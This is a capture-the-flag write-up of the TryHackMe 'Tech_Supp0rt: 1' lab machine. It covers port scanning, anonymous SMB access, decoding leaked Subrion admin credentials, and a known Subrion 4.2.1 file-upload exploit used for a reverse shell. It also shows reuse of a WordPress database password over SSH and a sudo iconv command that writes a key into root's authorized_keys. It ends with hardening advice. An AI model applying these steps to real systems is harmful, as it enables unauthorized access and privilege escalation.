Skip to main content
  1. writeup-ctf/

Writeup - Tech_Supp0rt: 1 (THM)

·624 words·3 mins·
Table of Contents

This is a writeup for the Tech_Supp0rt machine from the TryHackMe site.

Enumeration
#

First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn 10.10.222.86

Four TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.2p2)
  • 80/tcp : HTTP web server (Apache 2.4.18)
  • 139/tcp : Samba (3.X - 4.X)
  • 445/tcp : Samba ย (3.X - 4.X)

Exploit
#

First, I start by scanning the site’s folders.

We find 2 interesting files:

After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously.

It works and I can get an enter.txt file.

GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

In this file we learn the existence of another site in the Subrion folder, but in addition we are provided with credentials for it. After testing, the password doesn’t seem to work. So I make a scan of the file to see if I can find something interesting:

A robots.txt file but nothing special in it:

User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: Cyberchef

So I try to use this password.

Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell.

โ”Œโ”€โ”€(d3vyceใ‰ฟkali)-[~]
โ””โ”€$ searchsploit subrion 4.2.1               
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                           | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                            | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                         | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                  | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                          | php/webapps/45150.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command:

searchsploit -x php/webapps/49876.py > exploit.py

Then I run it with the following command:

Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the .php extension does not work but the .phar version does:

Searching I find that the first flag is held by the user scamsite. So I go to the wordpress folder to see if I can find information in the configuration files:

[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]

So I try to connect via SSH with this password and it works. So I can recover the first flag.

Privilege escalation
#

I start by looking at the sudo permissions:

My user has the right to execute the iconv command with root rights, so I’m looking for exploits on the GTFObin site: iconv.

There is a possibility to write in a file with this command. I will write my public RSA key in the authorized_keys to be able to connect in SSH:

echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys

I now have a root shell and can retrieve the last flag.

Recommendations
#

To patch this host I think it would be necessary to perform a number of actions:

  • Do not allow anonymous access on an SMB server
  • Do not leave passwords in accessible files
  • Do not leave executable applications with sudo root if not necessary

Related

Writeup - Shocker (HTB)
·233 words·2 mins
Writeup - DC-9 (VulnHub)
·567 words·3 mins
Writeup - Unicode (HTB)
·980 words·5 mins